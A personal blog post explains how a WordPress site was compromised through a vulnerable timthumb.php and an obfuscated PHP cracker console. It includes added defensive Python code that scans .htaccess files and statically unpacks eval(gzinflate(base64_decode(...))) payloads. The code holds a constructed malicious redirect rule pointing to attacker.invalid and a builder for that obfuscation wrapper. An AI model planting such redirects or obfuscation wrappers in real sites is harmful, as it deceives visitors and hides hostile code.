One of my sites got hacked. How?

  1. My wife tried out a number of WordPress themes while setting up her blog a year or two ago.
  2. One of them contained something called timthumb.php, which just this August was found to have a great big security vulnerability.
  3. Someone exploited this vulnerability, probably by scanning for every possible theme that contained it, and put a cracker console in the cache directory of that theme.
  4. They used this console to find and edit every .htaccess on that user account to include some malicious code. (This was several sites, because I was lazy.)
  5. It redirected to a quite nasty URL whenever a referrer from a longish list of search engines was seen.
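The post doesn't show the injected .htaccess, so here is an added example of my own (not the author's files and not the attacker's code) of the check I'd run across an account after something like this: walk every .htaccess and flag any mod_rewrite rule that is conditioned on HTTP_REFERER and then redirects to an absolute URL. The sample .htaccess contents, the search-engine list, the RewriteCond/RewriteRule form and the attacker.invalid host are all constructed assumptions about what such an injection looks like.

```python
import os
import re
import tempfile

# Constructed .htaccess in the shape the post describes: referrer check for
# search engines feeding a redirect off-site. Assumed mod_rewrite form; the
# exact directives the real injection used are not on the page.
INJECTED_HTACCESS = """# BEGIN WordPress
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|yahoo|bing|msn|ask|aol)\\. [NC]
RewriteCond %{REQUEST_URI} !^/wp-admin [NC]
RewriteRule ^(.*)$ http://attacker.invalid/go.php?ref=$1 [R=301,L]
# END WordPress
"""

# Constructed ordinary WordPress permalink rules, for comparison.
CLEAN_HTACCESS = """RewriteEngine On
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
"""

REFERER_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
OFFSITE_REDIRECT = re.compile(r"^\s*RewriteRule\s+\S+\s+(https?://\S+)", re.I)


def suspicious_rules(text):
    """Return (referrer_pattern, redirect_target) pairs for every RewriteCond
    on HTTP_REFERER whose governed RewriteRule sends the visitor to an absolute
    URL. RewriteConds stack onto the next RewriteRule, so intervening
    RewriteCond lines are skipped rather than ending the search."""
    hits = []
    lines = text.splitlines()
    for i, line in enumerate(lines):
        m = REFERER_COND.match(line)
        if not m:
            continue
        for nxt in lines[i + 1:]:
            if nxt.strip().lower().startswith("rewritecond"):
                continue
            r = OFFSITE_REDIRECT.match(nxt)
            if r:
                hits.append((m.group(1), r.group(1)))
            break
    return hits


def scan_tree(root):
    """Walk an account's document roots and map each .htaccess (relative to
    root) to the suspicious rules found in it; clean files are omitted."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        if ".htaccess" not in files:
            continue
        path = os.path.join(dirpath, ".htaccess")
        with open(path, encoding="utf-8", errors="replace") as f:
            hits = suspicious_rules(f.read())
        if hits:
            findings[os.path.relpath(path, root)] = hits
    return findings


def demo():
    """Lay out three constructed sites in a temp dir (two hit, one clean) and scan them."""
    root = tempfile.mkdtemp()
    for site, content in (("blog", INJECTED_HTACCESS),
                          ("photos", INJECTED_HTACCESS),
                          ("clean", CLEAN_HTACCESS)):
        os.makedirs(os.path.join(root, site))
        with open(os.path.join(root, site, ".htaccess"), "w") as f:
            f.write(content)
    return scan_tree(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        for pattern, target in hits:
            print("%s: referrer %s -> %s" % (path, pattern, target))
```

Point it at the account's home directory rather than one site's docroot; the post's whole point is that one shell edited every .htaccess the user owned, so a scan scoped to the blog alone would have missed the other sites.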

So that’s not terribly nice. I take some small comfort in knowing that at least I have a lot of company. Also, I feel validated in moving off WordPress.

The cracker console was actually quite interesting. If you’re curious, you can see it on this gist, slightly expanded for readability (or just a screenshot).

It was obfuscated by being a big string that ran through preg_replace using the e modifier, which makes PHP eval() the replacement string as code once the match has been substituted in (that modifier was deprecated in PHP 5.5 and removed in PHP 7.0; preg_replace_callback is the sane alternative). Yes, this is a genuinely insane feature. That turned some unicode-escaped characters at the beginning into eval(gzinflate(base64_decode('), which revealed the rest of the huge string to be a base64-encoded, deflated blob of source code. One caveat if you try to unpack one of these yourself: gzinflate() is the inverse of gzdeflate() and expects a raw DEFLATE stream with no gzip header, so gunzip on the base64-decoded bytes will just complain; decode it with a raw-inflate call rather than by letting the eval run.
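To make that unwrapping concrete, here is an added Python example of my own, not the console from the gist and not anything the author posted. It builds a constructed stand-in with the same shape (a preg_replace() call under the e modifier whose replacement is a \x-escaped eval(gzinflate(base64_decode('...'))) around a base64 blob, nested twice) and then peels it statically without executing any PHP. The placeholder payload, the "/./e" pattern, the two-layer nesting and the \x escape form are assumptions; the raw-DEFLATE behaviour of gzinflate()/gzdeflate() is how PHP actually works.

```python
import base64
import re
import zlib

# Constructed stand-in for the console's real payload; not the code from the gist.
INNER_SOURCE = b"<?php echo 'decoded layer'; ?>"


def php_gzdeflate(data: bytes) -> bytes:
    """PHP's gzdeflate() writes a raw DEFLATE stream. zlib.compress() would add a
    2-byte header and a 4-byte Adler-32 trailer, so use negative wbits instead."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


def php_gzinflate(data: bytes) -> bytes:
    """Static equivalent of PHP's gzinflate(): inflate a raw DEFLATE stream."""
    return zlib.decompress(data, -15)


def php_hex_escape(s: str) -> str:
    """Write every byte of s as a PHP double-quoted \\xNN escape, the way the
    console hid its eval() call from a casual reader (assumed \\x form)."""
    return "".join("\\x%02x" % b for b in s.encode())


def build_stub(source: bytes, layers: int = 2) -> str:
    """Build a constructed PHP file in the shape the post describes: `layers`
    nested eval(gzinflate(base64_decode('...'))) wrappers, the outermost call
    hex-escaped and fired through preg_replace() under the e modifier."""
    body = source
    for _ in range(layers):
        blob = base64.b64encode(php_gzdeflate(body)).decode()
        body = ("eval(gzinflate(base64_decode('%s')));" % blob).encode()
    text = body.decode()
    head = "eval(gzinflate(base64_decode('"
    replacement = php_hex_escape(head) + text[len(head):]
    return '<?php preg_replace("/./e", "%s", "."); ?>' % replacement


HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{1,2})")
PREG_CALL = re.compile(r'preg_replace\s*\(\s*"([^"]*)"\s*,\s*"((?:[^"\\]|\\.)*)"', re.S)
LAYER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)\s*\)",
    re.S)


def unescape_php_hex(s: str) -> str:
    """Resolve \\xNN escapes as PHP's double-quoted string parser would."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)


def preg_replace_e_payloads(php: str) -> list:
    """Find preg_replace() calls whose pattern carries the e modifier and return
    each decoded replacement string, i.e. the code PHP would eval().
    Assumes a single-character delimiter such as / or #, not a bracket pair."""
    payloads = []
    for m in PREG_CALL.finditer(php):
        pattern, replacement = m.group(1), m.group(2)
        if not pattern:
            continue
        modifiers = pattern.rsplit(pattern[0], 1)[1]  # text after closing delimiter
        if "e" in modifiers:
            payloads.append(unescape_php_hex(replacement))
    return payloads


def peel_layers(code: str, max_layers: int = 20):
    """Unwrap nested eval(gzinflate(base64_decode('...'))) statically, never
    executing anything. Returns (innermost source, layers removed)."""
    removed = 0
    while removed < max_layers:
        m = LAYER.search(code)
        if not m:
            break
        code = php_gzinflate(base64.b64decode(m.group(1))).decode("utf-8", "replace")
        removed += 1
    return code, removed


def deobfuscate(php: str):
    """Decode the first e-modifier payload in a PHP file down to plain source."""
    payloads = preg_replace_e_payloads(php)
    if not payloads:
        return None, 0
    return peel_layers(payloads[0])


if __name__ == "__main__":
    stub = build_stub(INNER_SOURCE)
    print(stub[:100] + "...")
    source, n = deobfuscate(stub)
    print("layers removed:", n)
    print(source)
```

The real console will have more noise than this (variable indirection, string concatenation, a different regex), so treat the peeling loop as the reusable part: each time you are left holding eval(gzinflate(base64_decode(...))), base64-decode, raw-inflate, and look again, and stop at a layer limit so a crafted file can't keep you inflating forever.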

The lesson I’m taking from this is: security is hard to enforce when themes that non-technical people are expected to use can contain executable code. Or even technical people… I wouldn’t have caught that if I’d been looking for a WordPress theme.